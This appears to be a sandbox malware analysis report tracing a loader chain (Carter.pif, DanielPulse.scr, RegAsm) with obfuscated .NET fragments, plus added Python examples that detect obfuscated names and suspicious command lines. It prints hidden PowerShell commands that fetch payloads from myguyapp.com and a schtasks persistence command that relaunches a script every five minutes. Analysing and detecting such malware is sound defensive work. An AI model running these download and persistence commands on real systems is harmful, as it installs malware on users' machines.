Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: aclayers.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: sfc.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: sfc_os.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: wbemcomn.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: avicap32.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: msvfw32.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000028.00000000.3262451452.00000000004E2000.00000002.00000001.01000000.00000012.sdmp, RegAsm.exe.28.dr
              Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000028.00000000.3262451452.00000000004E2000.00000002.00000001.01000000.00000012.sdmp, RegAsm.exe.28.dr

              Data Obfuscation

Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1hDllwdT4WVgtLtvrh9HNTiswVDrK.eJw816nOtBnQZuwusfPwdeCqpzSPc,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._6VCrJCYx9STcmgqNj8H9Kfg3sUAts,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._4JfBy5iKF4dHKJv3wpolEJW2Kc5aN,_1hDllwdT4WVgtLtvrh9HNTiswVDrK.fUOnaw45vUZW9wRtPzKDoSUr7wQOr,GKj04XVvJiEzT5.o4DomEaaAK3Tvn()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2],GKj04XVvJiEzT5.HW4WcRdB9jpgvy(GKj04XVvJiEzT5.LnW574bP2vfKev(B7gC3ws7qAtINRZuxsMLlEJhLdYgq[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd System.AppDomain.Load(byte[])
Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17 System.AppDomain.Load(byte[])
Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | .Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 15_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_01008B75 push ecx; ret 28_2_01008B88
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_00FFCBDB push eax; retf 28_2_00FFCBF8
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 36_2_00858B75 push ecx; ret 36_2_00858B88
Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, OfpCuG0X22QLMT.cs | High entropy of concatenated method names: 'nYwX372KteT5t2', 'segcmNagSiz7hL', 'yb0jQST0YwMHe1', '_0RenYuPKc4bvZA', 'JZsQDAM9n6EtQO', 'nH0p3C37Fxk65v', 'wQuomVoWPHIdrS', 'KcyJvFgDlyg3yX', 'loFybsLcslp7YB', 'OqFzKE7yCCpgGL'
Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, kqeFvQIpnkai8I7JJTganEHGxWh1A.cs | High entropy of concatenated method names: 'aRwUsZ42Qp2Iu55HZmFMSXPDzzjZF', 'r9VwT22LhaEvtkx68iMROo7ndw3YZ', 'jrU22mrrq7mmJu6zwT9QAgvUnX9CJ', 'V9WvHsnCndciRvznYV6E8Iiw7Ijry', 'sGZ2ry3eOxX0Kx', 'yIBnpeSQWl0II9', 'xgpfXiKspkv7Qk', '_43XjyQXj7XyIa1', 'a89z5bafQjfyZs', 'Tk551t0Ool3k8m'
Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, GKj04XVvJiEzT5.cs | High entropy of concatenated method names: '_31TqwEG7d5XQHj', 'lxcCKU7qpJsmyP', 'YZYM9q6UFN8qLN', 'qbUFKJUwRHfrx0', 'yp447Ls9FeU2rB', 'v2qtSP4rX7Lk2T', '_913bZMPdi8gyo6', 'ub5OHWFnNsEeGb', 'J3wXGNI0TDWKm6', 'LnW574bP2vfKev'
Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs | High entropy of concatenated method names: 'A8tvE0DZ8bvmGcdzUXcKpnPMdpDux', 'W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd', 'ft4DTvZvc4qN6kRvp59xULzP1mvg8', 'h5DA5Rai9oL4jV2ulFHvRbWYSJygJ', 'O4KRgJLa3ckMhcPaD7WwIhODI7hWV', 'YWUQmw7KiGzjOEEcq4lQEbMvcLlhm', 'EJyK88GxspHTRmtV2qD89iF21FbSy', 'IhlkrpmLJYz1G6gP55j78Ej4gKn7F', 'm8302rRfONzkL3YJxiETt06WijQVn', 'P9l9FPyls55tddMfrIzTDmtDXAy1p'
Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, 75lcEdvWjHm39L5ktP3tlqVbSoumD.cs | High entropy of concatenated method names: 'GLV28Q7RWReL58LNXG4dRIdIK2TEN', 'SqFko7T9STuWHJvrJgezXiBwfKMUK', 'W4PVwXl8ze5GoIs5LD920v8iPvDpI', 'VuiMLbYUZ5mbwdX2kA30fKD2DAOuV', 'lkt0AxMEBI88hk7IoXbH4QyieI6eA', 'lfIrGorQseyo6qZGq1AaQGw9LAMH7', 'mMD8nCbTfzppkmkizs1ZJLk6b6GTh', 'NAsi31w08xZTNd4EnIYvztAjeNjfl', 'dwTlKIVNZIbv7CCltiTquHRE8Fbjk', 'NAmq1jGo4CTjwh'
Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, JbeTyT6ozehDZJ.cs | High entropy of concatenated method names: '_4qRRAkWwEHf3Zd', 'vRsh53PpGgdqA0', '_8Hq2Or18riYaIv', '_8mRH3Hyg3XD8u5', 'EdcUKUZTwxyIgi', '_6vgoIitpz9FToY', 'kF9NScHwDxQCcQ', 'ebBHLsDcmu1A20', 'sfMOP7twzn5TxB', 'TEyNm0Eygu7184'
Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs | High entropy of concatenated method names: '_2mGh5CdvITFqIEgkpZMeXEYaYAyDB', '_9BeG36XnpwBXeXYTPZ4EKlMNJsvBQ', 'nZq2XPd9g1M2B2LsBPHPhOcwls9uQ', 'IXpGxkIWH8t4eoPAyitkJLIMPKWb6', 'w266axfymAlJYlHxOy7UD7CgTETRm', 'ImNQKUnqPr9jIMbbRrVqiJBKaucLC', 'hvtupL1aknPiuTNtO4sMyUTjVVlCG', 'LuqfnAbPcScBSkmye7C3NBjgwO957', 'qHF4AT3e2DvOntMCkk5fkm78V3UET', 'CLYFb0PcaLLnKDeZTkE3vmfjdeJfz'
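The "High entropy of concatenated method names" rows above score how uniformly the characters are distributed once every method name of a class is joined into one string; obfuscators that emit random alphanumeric identifiers push that figure far above anything human-written names reach. The Python below is an added example, not Joe Sandbox's implementation: it computes Shannon entropy on the OfpCuG0X22QLMT.cs names copied from the row above and on a constructed set of readable names, and adds a digit-ratio signal. The thresholds and the readable comparison set are assumptions of this example.

```python
"""Entropy heuristic for obfuscated .NET method names.

Added example. Reproduces the idea behind the "High entropy of concatenated
method names" rows: join every method name of a class and measure how
uniformly the characters are distributed. Thresholds and the readable
comparison set are assumptions of this example, not Joe Sandbox's values.
"""
import math
import re
from collections import Counter
from typing import Iterable, List

# Method names copied from the OfpCuG0X22QLMT.cs row of the report.
OBFUSCATED_NAMES: List[str] = [
    "nYwX372KteT5t2", "segcmNagSiz7hL", "yb0jQST0YwMHe1", "_0RenYuPKc4bvZA",
    "JZsQDAM9n6EtQO", "nH0p3C37Fxk65v", "wQuomVoWPHIdrS", "KcyJvFgDlyg3yX",
    "loFybsLcslp7YB", "OqFzKE7yCCpgGL",
]

# Constructed set of ordinary, human-written method names for contrast.
READABLE_NAMES: List[str] = [
    "GetSettings", "SetSettings", "LoadConfig", "SaveConfig", "ReadRegistry",
    "WriteRegistry", "OpenSocket", "CloseSocket", "SendBeacon", "StartTimer",
]


def shannon_entropy(text: str) -> float:
    """Shannon entropy of `text` in bits per character; 0.0 for empty input."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def method_name_entropy(names: Iterable[str]) -> float:
    """Entropy of all names joined into one string, the quantity the heuristic scores.

    Joining matters: ten short names scored individually would each look
    high-entropy, while the joined string also exposes repeated prefixes
    (Get/Set/Load/Save) that pull human-written sets down.
    """
    return shannon_entropy("".join(names))


def digit_ratio(names: List[str]) -> float:
    """Share of names containing a digit; hand-written C# identifiers rarely do."""
    if not names:
        return 0.0
    return sum(1 for name in names if re.search(r"\d", name)) / len(names)


def looks_obfuscated(names: List[str], entropy_threshold: float = 5.0,
                     digit_threshold: float = 0.5) -> bool:
    """Flag a class whose method names are both high-entropy and digit-heavy.

    Mixed-case alphanumerics cap out near log2(62) = 5.95 bits; English
    identifier text sits around 4.2. Both cut-offs are assumptions here.
    """
    return (method_name_entropy(names) >= entropy_threshold
            and digit_ratio(names) >= digit_threshold)


if __name__ == "__main__":
    for label, names in (("obfuscated", OBFUSCATED_NAMES), ("readable", READABLE_NAMES)):
        print(f"{label:11s} entropy={method_name_entropy(names):.2f} bits "
              f"digit_ratio={digit_ratio(names):.1f} flagged={looks_obfuscated(names)}")
```

The two signals are deliberately combined: a short class with a handful of terse names can score a high entropy by chance, but it will not also have digits in most of its identifiers, which is the tell of a renaming obfuscator (C# identifiers cannot begin with a digit, hence the leading underscore on names such as `_0RenYuPKc4bvZA`).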

              Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif (2 identical rows)
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | File created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr (2 identical rows)
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | File created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\msword\msword.exe

              Boot Survival

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url (2 identical rows)
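The hidden PowerShell download and Expand-Archive rows under Data Obfuscation and the schtasks row above share one shape: a built-in Windows tool pointed at a user-writable path, plus, for the task, a minute-level schedule. The Python below is an added example, not part of the Joe Sandbox report: it runs a few such rules over process-creation command lines. The four suspicious command lines are copied from the report's rows; the rule names, regular expressions and the two benign control lines are assumptions of this example.

```python
"""Rule-based triage of process-creation command lines.

Added example. The command lines below are copied from the report's
"Process created" rows (Data Obfuscation and Boot Survival); the rules,
their names and the two benign control lines are assumptions of this
example, not detection logic from the report.
"""
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# Directories a standard user can write to; staging payloads there is the
# common thread in the report's rows.
USER_WRITABLE = r"\\(?:AppData\\(?:Local|Roaming)|Temp|Downloads)\\"


@dataclass
class Rule:
    name: str
    must_match: List[str] = field(default_factory=list)  # every pattern has to match


RULES: List[Rule] = [
    # powershell -WindowStyle Hidden ... Invoke-WebRequest ... -OutFile <user-writable path>
    Rule("hidden_powershell_download", [
        r"(?i)\bpowershell(?:\.exe)?\b",
        r"(?i)-windowstyle\s+hidden\b",
        r"(?i)\b(?:invoke-webrequest|iwr|start-bitstransfer)\b",
        r"(?i)-outfile\s+\S*" + USER_WRITABLE,
    ]),
    # Expand-Archive unpacking into a user-writable directory
    Rule("archive_expanded_in_user_dir", [
        r"(?i)\bexpand-archive\b",
        r"(?i)-destinationpath\s+\S*" + USER_WRITABLE,
    ]),
    # schtasks /create whose action is a script host pointed at a user-writable path
    Rule("schtasks_script_host_persistence", [
        r"(?i)\bschtasks(?:\.exe)?\b.*\s/create\b",
        r'(?i)/tr\s+"?(?:wscript|cscript|mshta|powershell|rundll32|regsvr32)\b',
        r"(?i)/tr\s+.*" + USER_WRITABLE,
    ]),
    # minute-granularity schedule: a relaunch loop, not a maintenance job
    Rule("schtasks_minute_schedule", [
        r"(?i)\bschtasks(?:\.exe)?\b.*\s/create\b",
        r"(?i)/sc\s+minute\b",
    ]),
]

# First four lines copied from the report; last two constructed as benign controls.
SAMPLE_COMMANDS: List[str] = [
    r'powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"',
    r'powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"',
    r'powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"',
    r'''schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F''',
    r'schtasks.exe /create /tn "Backup" /tr "C:\Program Files\Backup\backup.exe" /sc daily /st 02:00',
    r"tasklist",
]


def triage(command_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (rule_name, command) for every rule all of whose patterns match a command."""
    hits: List[Tuple[str, str]] = []
    for cmd in command_lines:
        for rule in RULES:
            if all(re.search(pattern, cmd) for pattern in rule.must_match):
                hits.append((rule.name, cmd))
    return hits


if __name__ == "__main__":
    for rule_name, cmd in triage(SAMPLE_COMMANDS):
        print(f"[{rule_name}] {cmd}")
```

Every rule keys on a combination rather than a single attribute, so a scheduled task by itself, or a PowerShell download by itself, does not fire; the benign daily task pointing at Program Files and the bare `tasklist` produce no hits, while the Wagner task trips both the script-host rule and the minute-schedule rule.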

              Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 identical rows)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 identical rows)
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_010659B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_00FF5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 36_2_008B59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 36_2_00845EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_010033B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW, followed by a long run of repeated GetProcAddress calls
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX (5 identical rows)
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX (2 identical rows)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (78 identical rows)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
